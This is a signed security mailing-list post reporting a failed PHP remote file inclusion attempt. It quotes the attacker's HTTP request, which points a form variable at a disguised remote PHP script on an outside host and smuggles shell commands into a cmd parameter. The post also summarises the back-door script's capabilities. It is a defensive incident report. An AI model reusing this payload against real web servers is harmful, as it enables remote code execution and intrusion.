Data Cha0s PHP script attempt

[Kirby Angell <kangell () alertra com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Source IP: 200.203.109.237
Attack:  PHP form variable include

Twice tonight our web server received URL requests like this:

GET
/uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w
HTTP/1.0
Host: uptime.alertra.com
User-Agent: lwp-trivial/1.35

The attack attempts to trick the uptime.php form into loading the given
URL through one of the form variables.  Our forms are highly paranoid,
so that didn't work.  Of interest though, if you haven't seen it (and I
hadn't) is the script they tried to download:

http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg

which isn't a JPG at all, but itself is a PHP page.  I guess they
thought that our "pin" variable was used in an "include" statement.  The
rogue PHP script does all sorts of interesting things such as, running
commands (as in the attack above), gathering intelligence, attempting
exploits, and setting up back doors.

The script is apparently not too recent.  It won't work on any default
PHP install version 4.2 and above because it assumes the variables
passed to it will be converted to global variables (see:
http://www.php.net/manual/en/security.globals.php).  Recent versions of
PHP no longer do this.

The attacking IP seems to be a radio station in Brazil.  I have sent an
e-mail to them informing them that they are probably compromised.

I couldn't find much information about "lwp-trivial", but it seems to be
not good for anything but badness.  I guess I'll have to look into
banning bots like this from our web server all together.

- --
Thank you,

Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBXiXX21unUZAE9MARAnW3AJ0fl6LqRCuHHvPa8cVg+2QKEPEAPACglchA
LS8peUWtvAbSMlWVFW7jr7o=
=vxrb
-----END PGP SIGNATURE-----